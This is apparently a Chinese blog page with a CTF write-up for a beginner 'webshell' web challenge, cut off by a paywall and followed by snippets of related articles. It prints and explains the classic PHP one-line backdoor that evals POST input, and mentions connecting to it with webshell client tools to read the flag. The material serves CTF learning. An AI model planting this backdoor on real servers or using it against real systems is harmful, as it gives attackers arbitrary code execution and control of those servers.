ctf-web-攻防世界基础题-webshell

最新推荐文章于 2025-11-09 14:30:29 发布
原创 最新推荐文章于 2025-11-09 14:30:29 发布 · 2.4k 阅读 · 6 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文深入解析了经典的一句话PHP木马的工作原理,探讨了eval()函数如何执行远程提交的PHP代码,从而实现对服务器的控制。通过使用蚁剑等webshell连接工具,演示了如何测试并验证木马的有效性。

文章目录

【题目】

在这里插入图片描述
在这里插入图片描述

【分析】

经典的php一句话木马

<?php @eval($_POST['shell']);?>
/*
@ 抑制错误显示
eval() 将字符串当作代码来执行,是一个非常危险的函数。
$_POST是一个关联数组,数组的值是一个字符串
'shell' 是关联数组的键值,是一个字符串
通过这个php一句话可以执行任意的php code,可以达到控制服务器的效果。
*/

使用webshel

最低0.47元/天 解锁文章
debaowang
关注
网络安全CTF流量分析-入门3-Webshell连接流量分析
m0_51198141的博客
09-03 2285
同上一问,将frp文件内容解码,得到账户是 0HDFt16cLQJ 密码是JTN276Gp。所以答案就是 Admin123!
CTFSHOW 菜狗杯 Webshell思路和方法
weixin_58052886的博客
06-14 986
分析代码,我们输入的参数名为 cmd,同时将传入的参数值首先进行反序列化操作,然后执行 init() 函数发现在反序列化之后。此时我们可以在构造反序列化语句中使用cmd命令。需要注意的是,这里我们不能使用"cat flag.php"命令,因为代码中有匹配判断,我们的代码中不能出现flag ,/i 表示忽略大小写。我们重新将cmd赋值为 “tac f* ”,并运行代码进行序列化:(也可以直接修改,只需要修改命令和对应的字符长度即可)利用序列的结果构造url语句,并测试。
CTF工具之WEB.zip
10-07
该工具包中含有17年永久火狐浏览器,抓包工具,SQL注入工具,webshell,网站后台扫描工具,代码审计系统等
CTF-Webshell后门
最新发布
MiyauchiRenge的博客
11-09 297
1.审目需要找到webshell后门 2.下载D盾扫描网站 扫面到了后门zp.php. 打开找到疑似flag的$pass 包上flag{}提交成功
CTfwebshell
m0_62102520的博客
07-06 629
步骤:请确保能互相ping通,将一句话木马放到phpstudy目录下的www目录下,配置好密码,通过蚁剑链接。不含之母数字的webshell
ctf-攻防世界-webwebshell
一只菜鸟的博客
11-08 1961
提示webshell在index.php里面,那就打开场景看看: 显然是一句话木马,密码为shell。 用菜刀或者蚁剑链接一句话,即可找到flag:
ctf web5 练习_CTF-攻防世界-WEB新手练习区 Writeup(12入门
weixin_33603656的博客
01-15 3884
注:作者是CTF初学者,边学习边记录,如有错误或疏漏请批评指正,也请各位大佬多多包涵。攻防世界-WEB新手练习区 12入门 Writeup(注意:攻防世界WEB每次生成场景后,有时flag会改变,因此flag不同不要在意,主要是学习解思路和方法)0X01view_sourceX老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。目提示查看源码,鼠标右键不管用,用F12...
-攻防世界-web基础
oonoonoo的博客
02-16 948
simple_php 目分析: 代码审计: 发现代码中给出了两个条件,把flag拆分到两个条件中。 条件1: if($a==0 and $a){ echo $flag1; } 说明:参数a=0且a为真才能得到半个flag. 条件2: if(is_numeric($b)){ exit(); } 说明:is_numeric()函数可以参考https://www.runoob.com/php/ph...
easyupload-CTF-攻防世界
szhangliwenya的博客
03-20 878
user.ini文件是php.ini的补充文件,当网页访问的时候就会自动查看当前目录下是否有.user.ini,然后将其补充进php.ini,并作为cgi的启动项。如果你的连接路径是http://x.x.x.x:端口/uploads/shell.jpg这样的话,是不对的。正确的连接url地址应为http://x.x.x.x:端口/uploads/index.php (请回想.user.ini文件及auto_prepend_file方法)左上角文件另存为.user.ini文件 后上传。
攻防世界-web高手进阶区
zji
04-25 7319
文章目录攻防世界-web高手进阶区一、baby_web二、Training-WWW-Robots1.引入库2.读入数据总结 攻防世界-web高手进阶区 提示:这里是记录web目,这里我基本不讲很多细节,请自行下载Burpsuite,web使用的等等工具。 一、baby_web 非常的简单,bp抓包直接把1.php去掉后,就看的flag了。 二、Training-WWW-Robots 非常的简单,点网页进去后,看到了robots.txt进去看到一个可以看到他有一个不允许访问的文件f10g.php,在
ctf web shell
god_001的博客
04-08 3320
目: 打开网址,发现一片空白,回来查看提示描述,经过分析发现,描述可等同于: 这是一个可变函数的应用,实际运行就等同于执行assert($_GET['s']); assert()函数在php语言中是用来判断一个表达式是否成立的,返回true or false; 重要的是函数括号内的语句会被执行。 因此,只要通过s传指令,就可以得到想要的结果,首先查看当前目录: http://114.67.175.224:18164/?s=system('ls') 发现当前目录有两个文件,再打.
CTF-web 第十部分 webshell基础与免杀
热门推荐
iamsongyu的博客
11-15 1万+
一、什么是webshell (1)webshell简介         webshell,顾名思义:web指的是在web服务器上,而shell是用脚本语言编写的脚本程序,webshell就是就是web的一个管理工具,可以对web服务器进行操作的权限,也叫webadmin。webshell一般是被网站管理员用于网站管理、服务器管理等等一些用途,但是由于webshell的功能比较强大,可以上传下载...
一天一道CTF 第九天(WebShell
scrawman的博客
03-08 630
[极客大挑战 2019]Knife 网页里的提示已经很明显了,就是要用shell,一句话木马也给你写好了。那就打开蚁剑或者中国菜刀,URL地址就是这个网页的地址,连接密码是Syc,其它的保持默认即可。连接上后查看系统文件就能找到flag [护网杯 2018]easy_tornado 点进网页是三个文件,我们一个一个查看 flag.txt提示我们flag在fllllllllag文件里,而且我们看到URL里还要求了文件的哈希值,也就是说我们要读取fllllllllag文件就必须要知道它的哈希值。 we
XCTF WEB webshell
无限迭代中......
06-30 1840
https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=0&id=5070 版本一 解:修改HTML代码提交一个shell的变量 变量值是webshell命令 ​​​​​​​<form action="http://111.198.29.45:36317/index.php" meth...
CTF中学习自增构造webshell
LCW991207的博客
12-23 1466
今天写了几道代码审计的,发现我是个菜鸟,所以借鉴各位师傅的文章,做一个总结。提示:以下是本篇文章正文内容,下面案例可供参考。
ctf web方向与php学习记录7之webshell初见
这周末在做梦的博客
08-27 591
webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。 顾名思义,“web”的含义是显然需要服务器开放web服务,“shell”的含义是取得对服务器某种程度上操作权限。webshell常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权
xctfwebshell
recordliu的博客
01-28 438
这里一句话木马已经上传了 我们选择用菜刀来访问,菜刀可以去ctf工具下载。 右键,添加,然后把地址输入进去,类型选择php,添加 然后双击进入添加的,查看文件有flag,选择双击, flag出现, ...
NSSCTF(MISC)—[陇剑杯 2021]webshell(问1~7)
hzhfhsq的博客
10-11 2052
流量包中发现该网站系统为Linux系统,由此猜测默认目录为/var/www/html也可以继续查看后续流量包,其中存在命令执行pwd,查看http流,可以准确的得到网站目录为/var/www/html。http contains "whoami"查看http协议中包含whoami(查看当前用户的命令)的流量包。http contains ".log"查看HTTP中有.log(日志文件后缀)的流量包.http contains "login"查看HTTP中有login(登录)的流量包。
攻防世界 web入门 webshell
weixin_45774059的博客
06-04 236
第一种方法burp抓包 第二种方法 python post
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符  | 博主筛选后可见
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值